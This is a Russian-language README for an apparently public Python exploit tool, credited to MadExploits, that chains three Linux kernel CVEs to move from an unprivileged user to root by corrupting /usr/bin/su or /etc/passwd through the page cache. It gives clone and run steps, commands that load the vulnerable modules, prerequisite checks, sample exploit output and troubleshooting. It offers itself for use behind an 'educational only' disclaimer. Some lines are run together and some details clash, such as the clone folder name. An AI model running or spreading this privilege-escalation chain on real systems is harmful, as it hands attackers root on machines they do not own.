
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit
Цепочка повышения привилегий для уязвимостей ядра Linux через несколько CVE
uid=1000 → root через запись в кеш страниц xfrm-ESP, RxRPC или Fragnesia
CVE-KERNEL — это инструмент повышения привилегий (LPE) на Python, который объединяет несколько CVE ядра Linux для эскалации от непривилегированного пользователя до root. Эксплойт нацелен на примитивы повреждения кеша страниц через подсистемы сетевого взаимодействия ядра.
Модифицировано MadExploits — обновлённый интерфейс, цветной вывод в терминале и улучшенная презентация потока эксплойта.
/usr/bin/su или /etc/passwdsu - при успешной эксплуатацииesp4, esp6, rxrpc и CONFIG_ESPINTCPCAP_NET_RAW через непривилегированные пространства имён╔══════════════════════════════════════════════════════════╗
║ ║
║ Linux Kernel LPE Chains ║
║ CVE-2026-43284 | CVE-2026-43500 | CVE-2026-46300 ║
║ ║
║ Modified By MadExploits ║
║ ║
╚══════════════════════════════════════════════════════════╝
[*] Current user: uid=1000
── Exploit Chain ──
[ESP] Attempting to corrupt /usr/bin/su...
[+] Namespace created successfully
[*] (Full SU corruption requires XFRM SA setup - C only)
[RxRPC] Attempting to corrupt /etc/passwd...
[*] Current root entry: b'root:x:0:0:root:/root:/bin/b'
── Fragnesia (CVE-2026-46300) ──
[Fragnesia] Attempting CVE-2026-46300 exploit...
[+] ESP-in-TCP support detected
[+] User namespace created (CAP_NET_RAW acquired)
sudo modprobe esp4
sudo modprobe esp6
sudo modprobe rxrpc
lsmod | grep -E 'esp4|esp6|rxrpc'
git clone https://github.com/MadExploits/CVE-2026-46300.git
cd CVE-KERNEL
Внешних зависимостей Python не требуется — используются только стандартные библиотеки.
python3 main.py
| Код | Значение |
|---|---|
0 | Эксплойт выполнен успешно или уже root |
1 | Эксплойт не удался (система исправлена или отсутствуют модули) |
flowchart TD
A[Start] --> B{Already root?}
B -->|Yes| C[Spawn root shell]
B -->|No| D{Already patched?}
D -->|Yes| C
D -->|No| E[ESP - CVE-2026-43284]
E --> F[RxRPC - CVE-2026-43500]
F --> G{Patched?}
G -->|Yes| C
G -->|No| H[Fragnesia - CVE-2026-46300]
H --> I{Patched?}
I -->|Yes| C
I -->|No| J[Exploit failed]
Повреждает /usr/bin/su через ассоциацию безопасности XFRM и изоляцию пользовательского пространства имён. Требует настройки сокета XFRM netlink (полная реализация на C).
Записывает в кеш страниц /etc/passwd через манипуляции с ключами RxRPC и системные вызовы splice()/vmsplice().
Запускает ошибку skb_try_coalesce через фрагментированные пакеты ESP-in-TCP для достижения примитива записи в кеш страниц.
Этот репозиторий содержит proof-of-concept на Python. Полная эксплуатация требует низкоуровневых системных вызовов, доступных только в версии на C:
# Быстрая диагностика
lsmod | grep -E 'esp4|esp6|rxrpc'
grep ESPINTCP /boot/config-$(uname -r)
cat /proc/sys/kernel/unprivileged_userns_clone
CVE-KERNEL/
├── main.py # Основной скрипт эксплойта (PoC на Python)
└── README.md # Документация
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предоставляется строго для образовательных целей, исследований безопасности и авторизованного тестирования на проникновение на системах, которыми вы владеете или на которые имеете явное письменное разрешение на тестирование.
| Модифицировано | MadExploits |
| Ссылки на CVE | CVE-2026-43284 · CVE-2026-43500 · CVE-2026-46300 |
Этот проект опубликован для образовательных и исследовательских целей. Используйте на свой страх и риск.
Модифицировано MadExploits · Исследование LPE ядра Linux
| CVE | Вектор | Цель |
|---|
| CVE-2026-43284 | xfrm-ESP | Повреждение бинарного файла /usr/bin/su |
| CVE-2026-43500 | RxRPC + splice | Запись в кеш страниц /etc/passwd |
| CVE-2026-46300 | Fragnesia (ESP-in-TCP) | Запись в кеш страниц через skb_try_coalesce |
| Требование | Описание |
|---|
| ОС | Linux (x86_64) |
| Python | 3.8 или выше |
| Привилегии | Непривилегированный пользователь (uid ≠ 0) |
| Модули ядра | esp4, esp6, rxrpc (загружаемые) |
| Конфигурация ядра | CONFIG_ESPINTCP=y или =m |
| Пользовательские пространства имён | Включены (/proc/sys/kernel/unprivileged_userns_clone) |
| Возможность | Python | C |
|---|
| User namespace setup | ✅ | ✅ |
| Patch detection | ✅ | ✅ |
| RAW socket trigger | ✅ | ✅ |
| XFRM netlink sockets | ❌ | ✅ |
| splice / vmsplice | ❌ | ✅ |
| AF_ALG crypto ops | ❌ | ✅ |
| RxRPC protocol handling | ❌ | ✅ |
| Проблема | Решение |
|---|
ESP modules not loaded | Выполните sudo modprobe esp4 esp6 |
ESP-in-TCP not enabled | В ядре отсутствует CONFIG_ESPINTCP — используйте другое ядро |
unshare failed | Включите пользовательские пространства имён или запустите на поддерживаемом дистрибутиве |
RAW sockets require CAP_NET_RAW | Убедитесь, что пользовательские пространства имён включены |
| Exploit failed | Система возможно исправлена — проверьте версию ядра |